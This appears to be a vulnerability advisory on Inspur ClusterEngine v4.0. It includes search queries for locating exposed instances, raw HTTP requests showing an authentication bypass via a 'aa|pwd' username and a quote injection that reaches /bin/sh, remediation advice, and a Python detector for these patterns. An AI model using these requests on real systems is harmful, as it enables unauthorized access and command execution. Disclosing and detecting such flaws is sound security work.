Overview
Inspur ClusterEngine v4.0 is a cluster management platform. It manages the hardware and software resources in a cluster and the jobs that users submit, and schedules those jobs according to resource usage in the cluster, improving both resource utilization and job execution efficiency.
Search keywords for a cyberspace mapping search engine:
title="TSCEV4.0" or "clusterengine v4.0" to collect the related assets.
Arbitrary user login
Setting the username field of the login request to a value of the form "any|pwd" is enough to log in to the system:
POST /login HTTP/1.1
Host: xxx
Content-Length: 42
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=

op=login&username=aa%7Cpwd&password=123123
The response is as follows, which means the login succeeded:
HTTP/1.1 200
Set-Cookie: username=aa|pwd; Max-Age=604800; Expires=Mon, 19-Apr-2021 14:42:23 GMT; Path=/; HttpOnly
Set-Cookie: userType=users; Max-Age=43200; Expires=Tue, 13-Apr-2021 02:42:23 GMT; Path=/; HttpOnly
Set-Cookie: vertifyUser=true; Max-Age=43200; Expires=Tue, 13-Apr-2021 02:42:23 GMT; Path=/; HttpOnly
Set-Cookie: L_TIMES=1618238543432; Max-Age=604800; Expires=Mon, 19-Apr-2021 14:42:23 GMT; Path=/; HttpOnly
Content-Type: text/json;charset=utf-8
Date: Mon, 12 Apr 2021 14:42:23 GMT
Connection: close
Content-Length: 35
{"err":"","exitcode":0,"out":"/\n"}
Arbitrary command execution
Passing a single quote in the username parameter of the login request makes it error out, and the response exposes a /bin/sh -c error message, which shows that the value reaches a shell command line:
POST /login HTTP/1.1
Host: xxx
Content-Length: 42
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=

op=login&username=aa'&password=123123
Error message:
HTTP/1.1 200
Content-Type: text/json;charset=utf-8
Date: Mon, 12 Apr 2021 14:44:13 GMT
Connection: close
Content-Length: 159
{"err":"/bin/sh: -c: line 0: unexpected EOF while looking for matching `''\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n","exitcode":1,"out":""}

I don't understand why the code was written this way.
Remediation
- Upgrade to the latest version;
- As a temporary measure, restrict access.
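Until the upgrade is in place, captured /login traffic can be checked for the two patterns shown above. The following is an added example, not code from the original post or from the vendor. It assumes the request and response bodies are available (for example from a reverse proxy); the function names and the username allowlist are assumptions.

```python
import json
import re
from urllib.parse import parse_qs

# Assumption: legitimate account names use only these characters.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._@-]{1,64}")
# Shell diagnostics like the one in the error response shown above.
SHELL_ERROR = re.compile(
    r"/bin/(?:ba)?sh: .*(?:unexpected EOF|syntax error|not found)", re.S)


def check_login_request(body: str) -> list:
    """Return findings for one form-encoded POST /login body."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("op") != ["login"]:
        return []
    findings = []
    for name in form.get("username", []):
        # '|' and quotes are never valid here, so both captures are flagged.
        if not SAFE_USERNAME.fullmatch(name):
            findings.append(f"username outside allowlist: {name!r}")
    return findings


def check_login_response(body: str) -> list:
    """Return findings for one JSON /login response body."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    err = doc.get("err", "") if isinstance(doc, dict) else ""
    if isinstance(err, str) and SHELL_ERROR.search(err):
        return ["response leaks a shell error message"]
    return []


# Constructed samples modelled on the captures in this post.
SAMPLES = [
    ("op=login&username=alice&password=x", '{"err":"","exitcode":0,"out":""}'),
    ("op=login&username=aa%7Cpwd&password=123123",
     '{"err":"","exitcode":0,"out":"/\\n"}'),
    ("op=login&username=aa'&password=123123",
     '{"err":"/bin/sh: -c: line 0: unexpected EOF while looking for '
     'matching `\'\'\\n","exitcode":1,"out":""}'),
]

if __name__ == "__main__":
    for req, resp in SAMPLES:
        print(req, check_login_request(req) + check_login_response(resp))
```

The same allowlist can be enforced as a reject rule in front of the application when access restriction is used as the temporary measure.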
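This article describes a security vulnerability in the Inspur ClusterEngine V4.0 cluster management platform that allows any user to access the system through a specific login method and may lead to command execution. An attacker can inject into the username field during login to trigger a system error and obtain sensitive information. The remediation advice is to upgrade to the latest version and to implement access restrictions.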




